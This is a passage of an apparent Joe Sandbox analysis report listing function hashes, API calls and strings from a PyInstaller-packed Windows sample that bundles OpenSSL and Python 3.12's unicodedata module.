                                                                                                                                                                                                                            • Instruction ID: 7641d18633335180a6573666d5c874795cd9774ed52d63362414a19d8978bc5d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 80df790e4dc20ce4daf526b56dc0de662265a938807179003cfdcd9a3866f9da
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 67218020E0C75242FB599723564217959625F49BACF340734E83E87AD7DEEDB4008390
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debugR_set_error
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_lib.c$ssl_peek_internal
                                                                                                                                                                                                                            • API String ID: 1552677711-1363730714
                                                                                                                                                                                                                            • Opcode ID: 1b333764648ff260a6c02d2ac8eded9e182aa65c1543dabf16a4d074aade2757
                                                                                                                                                                                                                            • Instruction ID: 9e79c05b7723c34f5677098492e6de6c7a101f6a996065f349e36fac0b3cad89
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1b333764648ff260a6c02d2ac8eded9e182aa65c1543dabf16a4d074aade2757
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 56217F31B08B8282E7109B11E561AE97760EB84BD4F580631EEBDC77E9DF3CE4518B00
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: O_clear_flagsO_set_flagsR_newR_set_debug
                                                                                                                                                                                                                            • String ID: ..\s\ssl\statem\statem_srvr.c$ossl_statem_server_read_transition
                                                                                                                                                                                                                            • API String ID: 4119164335-396436010
                                                                                                                                                                                                                            • Opcode ID: 3b9942497a00dddd29993045adddac0f6e5e25eb10adb42d596a6deddd5604e0
                                                                                                                                                                                                                            • Instruction ID: 5d5301323132f91f759054eccc64c1f46867e97f058fd7e528cf647e0192098e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3b9942497a00dddd29993045adddac0f6e5e25eb10adb42d596a6deddd5604e0
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F8116061F062464AFB959B61D466BBC2381DB81B04F884234CE3CCA6CEDF7C98818B04
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Message$ErrorFormatLast
                                                                                                                                                                                                                            • String ID: %ls%ls: %ls$<FormatMessageW failed.>$Error
                                                                                                                                                                                                                            • API String ID: 3971115935-1149178304
                                                                                                                                                                                                                            • Opcode ID: 637b316d3db02e0848746ebbd2d4d607b7aa0f267e08e9a77fe1f48c74dfad2f
                                                                                                                                                                                                                            • Instruction ID: 2baa6b743cd14df1a889a36e9120847630a5caa08db5a6047544937fc12f6445
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 637b316d3db02e0848746ebbd2d4d607b7aa0f267e08e9a77fe1f48c74dfad2f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E2217172618B8192E720DB16F4502EA77A4FF88788F500136EBCD93A99DFBCD156CB40
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debug
                                                                                                                                                                                                                            • String ID: ..\s\ssl\statem\extensions_clnt.c$tls_parse_stoc_supported_versions
                                                                                                                                                                                                                            • API String ID: 193678381-4079417333
                                                                                                                                                                                                                            • Opcode ID: ea19e3c1eec7e63e05fd280717a0f3d5609df9ba7246379ff7d219529d572970
                                                                                                                                                                                                                            • Instruction ID: 898d464a08116e72c3d731d91dac0f0d1e5ae3db903c15de0a89aa4bd2bacc00
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ea19e3c1eec7e63e05fd280717a0f3d5609df9ba7246379ff7d219529d572970
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5811B261B0968242F766A765E831FF92B90AF84740F845131DA7CC3BDBDE2DE6919B00
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debug
                                                                                                                                                                                                                            • String ID: ..\s\ssl\statem\extensions.c$final_ems
                                                                                                                                                                                                                            • API String ID: 193678381-1856277603
                                                                                                                                                                                                                            • Opcode ID: cce74bf344d7d4a08a0a5a9e15c6f18873a729b9b1b0b583b057dde68333db6c
                                                                                                                                                                                                                            • Instruction ID: eeb0e4a572aa4205136fbc20c80ab6f80d194e6f32888f53729115b18e783f40
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cce74bf344d7d4a08a0a5a9e15c6f18873a729b9b1b0b583b057dde68333db6c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1511EF20F0960346F794A3E6D829FF82311AB85700F848232C93CC77DADE3DA58AC700
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                            • String ID: CONOUT$
                                                                                                                                                                                                                            • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                            • Opcode ID: 17f0a2ce441502ced7ada2557d00087b7598f0e631849b46a0ea05360e476559
                                                                                                                                                                                                                            • Instruction ID: a766c2c9121e7f1eff9ce8c99fcdf14da72c8e044ea36689464694f4b191c2aa
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 17f0a2ce441502ced7ada2557d00087b7598f0e631849b46a0ea05360e476559
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EC119D21B18A4186E7918B57E944329BAA4FF98FE8F600234EA5DC7795CFBCE9048740
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • _PyArg_CheckPositional.PYTHON312 ref: 00007FFDFABD36E7
                                                                                                                                                                                                                            • _PyArg_BadArgument.PYTHON312 ref: 00007FFDFABD371A
                                                                                                                                                                                                                              • Part of subcall function 00007FFDFABD11B0: PyUnicode_CompareWithASCIIString.PYTHON312 ref: 00007FFDFABD11E2
                                                                                                                                                                                                                              • Part of subcall function 00007FFDFABD11B0: PyUnicode_CompareWithASCIIString.PYTHON312 ref: 00007FFDFABD11FA
                                                                                                                                                                                                                              • Part of subcall function 00007FFDFABD11B0: PyType_IsSubtype.PYTHON312 ref: 00007FFDFABD121D
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875123056.00007FFDFABD1000.00000020.00000001.01000000.00000019.sdmp, Offset: 00007FFDFABD0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfabd0000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Arg_CompareStringUnicode_With$ArgumentCheckPositionalSubtypeType_
                                                                                                                                                                                                                            • String ID: argument 1$argument 2$normalize$str
                                                                                                                                                                                                                            • API String ID: 4101545800-1320425463
                                                                                                                                                                                                                            • Opcode ID: 6a3206665d50624963465f038f79663c2d3d68664346081dad0779ef5a43a2b4
                                                                                                                                                                                                                            • Instruction ID: f42d331a38eede78dcee9c7d0e702c4fe540a65d157d5f176a06af2b2cfb8852
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6a3206665d50624963465f038f79663c2d3d68664346081dad0779ef5a43a2b4
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 241152A1B0C68790EB588B56E4A1EB96760AF04FC4FD880B6D92D076DDDF3CD545D340
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875123056.00007FFDFABD1000.00000020.00000001.01000000.00000019.sdmp, Offset: 00007FFDFABD0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfabd0000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Arg_$ArgumentCheckPositional
                                                                                                                                                                                                                            • String ID: argument 1$argument 2$is_normalized$str
                                                                                                                                                                                                                            • API String ID: 3876575403-184702317
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debugR_set_error$L_sk_freeL_sk_new_nullstrncmp
                                                                                                                                                                                                                            • String ID: ..\s\ssl\d1_srtp.c$ssl_ctx_make_profiles
                                                                                                                                                                                                                            • API String ID: 3277051535-118859582
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debugR_set_errormemcpy
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_sess.c$SSL_SESSION_set1_id_context
                                                                                                                                                                                                                            • API String ID: 1331007688-3187944184
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1878218664.00007FFE0CFE1000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FFE0CFE0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffe0cfe0000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _aligned_free_aligned_malloc$callocfree
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2511558924-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: L_sk_num$L_sk_freeL_sk_new_nullL_sk_pushL_sk_value
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1173513325-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 00007FF602997AA0: GetCurrentProcess.KERNEL32 ref: 00007FF602997AC0
                                                                                                                                                                                                                              • Part of subcall function 00007FF602997AA0: OpenProcessToken.ADVAPI32 ref: 00007FF602997AD3
                                                                                                                                                                                                                              • Part of subcall function 00007FF602997AA0: GetTokenInformation.ADVAPI32 ref: 00007FF602997AF8
                                                                                                                                                                                                                              • Part of subcall function 00007FF602997AA0: GetLastError.KERNEL32 ref: 00007FF602997B02
                                                                                                                                                                                                                              • Part of subcall function 00007FF602997AA0: GetTokenInformation.ADVAPI32 ref: 00007FF602997B42
                                                                                                                                                                                                                              • Part of subcall function 00007FF602997AA0: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF602997B5E
                                                                                                                                                                                                                              • Part of subcall function 00007FF602997AA0: CloseHandle.KERNEL32 ref: 00007FF602997B76
                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,00007FF602993814), ref: 00007FF6029981EC
                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,00007FF602993814), ref: 00007FF6029981F5
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                            • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                            • API String ID: 6828938-1529539262
                                                                                                                                                                                                                            • Opcode ID: dd7889b1bbec3b02e81406288b4e7ebbd0e5a1754232ba221b086f5150490535
                                                                                                                                                                                                                            • Instruction ID: b21214a01f55ea03cc9b48970e19f03a07b129cd4d520e8fd6af0c9e47bda314
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dd7889b1bbec3b02e81406288b4e7ebbd0e5a1754232ba221b086f5150490535
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D921A621A187425AF710AB16E9153FA6BA1FF88798FA44435E94DC3787DFBCD910C740
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF6029A414D,?,?,?,?,00007FF6029A930A,?,?,?,?,00007FF6029A61EF), ref: 00007FF6029AA157
                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6029A414D,?,?,?,?,00007FF6029A930A,?,?,?,?,00007FF6029A61EF), ref: 00007FF6029AA18D
                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6029A414D,?,?,?,?,00007FF6029A930A,?,?,?,?,00007FF6029A61EF), ref: 00007FF6029AA1BA
                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6029A414D,?,?,?,?,00007FF6029A930A,?,?,?,?,00007FF6029A61EF), ref: 00007FF6029AA1CB
                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6029A414D,?,?,?,?,00007FF6029A930A,?,?,?,?,00007FF6029A61EF), ref: 00007FF6029AA1DC
                                                                                                                                                                                                                            • SetLastError.KERNEL32(?,?,?,00007FF6029A414D,?,?,?,?,00007FF6029A930A,?,?,?,?,00007FF6029A61EF), ref: 00007FF6029AA1F7
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
• Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Value$ErrorLast
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2506987500-0
                                                                                                                                                                                                                            • Opcode ID: d7258a963b453012969a6ad0a41331183a8a684c6c8b02150bb4772551ef5887
                                                                                                                                                                                                                            • Instruction ID: 2b11fe98feed3692f489ea1f102293dde1978b8413173d7977f817dd4a9c123e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d7258a963b453012969a6ad0a41331183a8a684c6c8b02150bb4772551ef5887
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F2115E20E0C74252FB59A7275A411796AA25F48BBCF744B34E83E86BD7DEACB441C390
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
• Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: D_unlockD_write_lockH_deleteH_retrieveM_freeR_newR_set_debug
                                                                                                                                                                                                                            • String ID: ..\s\ssl\statem\statem_lib.c$tls_finish_handshake
                                                                                                                                                                                                                            • API String ID: 3705674076-1263350687
                                                                                                                                                                                                                            • Opcode ID: 61fafb869941b040af3c4f18b7e0063985800c0f2c71365ea2fbce2590ed2c64
                                                                                                                                                                                                                            • Instruction ID: 5aed115c01bf78554b29760bcd9234a0490e1454a59d3cf1253497bcc1c01e49
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 61fafb869941b040af3c4f18b7e0063985800c0f2c71365ea2fbce2590ed2c64
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6D814C62B0868689E7559F25D460BB937A0EB41B88F488235CF6DCB7DECF78E585C340
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
• Associated: 00000001.00000002.1874987275.00007FF602990000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1875032378.00007FF6029BA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1875052495.00007FF6029CD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1875052495.00007FF6029D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1875084625.00007FF6029D5000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                            • String ID: Unhandled exception in script
                                                                                                                                                                                                                            • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                            • Opcode ID: 871562e2e37685642c61b886077a09c50489d96e77a218951f1cd4700f6b58b0
                                                                                                                                                                                                                            • Instruction ID: ef34a427f1518c5eaf43b796a104795b6c020d3000fdc189ec4866e2a649e1a4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 871562e2e37685642c61b886077a09c50489d96e77a218951f1cd4700f6b58b0
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 08316232A1968289EB24DF62E8552F97B60FF89798F640135EE4E87B56DF7CD104C700
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
• Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: O_ctrlR_newR_set_debugR_set_error
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_lib.c$SSL_write_early_data
                                                                                                                                                                                                                            • API String ID: 3777157029-3084438645
                                                                                                                                                                                                                            • Opcode ID: 1d92c5f44f662569f0fafcbcf6ee68dc0954c0132fe7684d77c092e3898e8029
                                                                                                                                                                                                                            • Instruction ID: 1e4651ccd28d09eafb982c2ece26a1962bf8e222d904a6dd65860193ba217d5b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1d92c5f44f662569f0fafcbcf6ee68dc0954c0132fe7684d77c092e3898e8029
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 87317C22B0964297E7699B61C6A1BBD6790FB41790F440236EBBDC77CACF7CE4618700
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1877092897.00007FFDFF241000.00000020.00000001.01000000.00000013.sdmp, Offset: 00007FFDFF240000, based on PE: true
• Associated: 00000001.00000002.1877067967.00007FFDFF240000.00000002.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877092897.00007FFDFF2C3000.00000020.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877173635.00007FFDFF2C5000.00000002.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877203803.00007FFDFF2ED000.00000008.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877227349.00007FFDFF2F1000.00000004.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877249900.00007FFDFF2F2000.00000002.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877249900.00007FFDFF2F8000.00000002.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.1877249900.00007FFDFF300000.00000002.00000001.01000000.00000013.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdff240000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: R_newR_set_debugR_set_error
                                                                                                                                                                                                                            • String ID: ..\s\ssl\ssl_conf.c$ctrl_switch_option
                                                                                                                                                                                                                            • API String ID: 1552677711-2996977199
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1878127469.00007FFE0CFD1000.00000020.00000001.01000000.0000002B.sdmp, Offset: 00007FFE0CFD0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffe0cfd0000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: memset$_wassert
                                                                                                                                                                                                                            • String ID: hs->curlen < BLOCK_SIZE$src/MD5.c
                                                                                                                                                                                                                            • API String ID: 3746435480-3464417081
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875006833.00007FF602991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF602990000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff602990000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                                            • String ID: %s%s: %s$Error$Error/warning (ANSI fallback)
                                                                                                                                                                                                                            • API String ID: 1878133881-640379615
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875123056.00007FFDFABD1000.00000020.00000001.01000000.00000019.sdmp, Offset: 00007FFDFABD0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfabd0000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Arg_ArgumentSubtypeType_
                                                                                                                                                                                                                            • String ID: a unicode character$argument$east_asian_width
                                                                                                                                                                                                                            • API String ID: 1522575347-3913127203
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875123056.00007FFDFABD1000.00000020.00000001.01000000.00000019.sdmp, Offset: 00007FFDFABD0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfabd0000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: DoubleErr_Float_FromNumericStringSubtypeType_Unicode_
                                                                                                                                                                                                                            • String ID: not a numeric character
                                                                                                                                                                                                                            • API String ID: 1034370217-2058156748
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875123056.00007FFDFABD1000.00000020.00000001.01000000.00000019.sdmp, Offset: 00007FFDFABD0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfabd0000_DChOtFdp9T.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: DecimalDigitErr_FromLongLong_StringSubtypeType_Unicode_
                                                                                                                                                                                                                            • String ID: not a decimal
                                                                                                                                                                                                                            • API String ID: 3750391552-3590249192
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1875123056.00007FFDFABD1000.00000020.00000001.01000000.00000019.sdmp, Offset: 00007FFDFABD0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfabd0000_DChOtFdp9T.jbxd
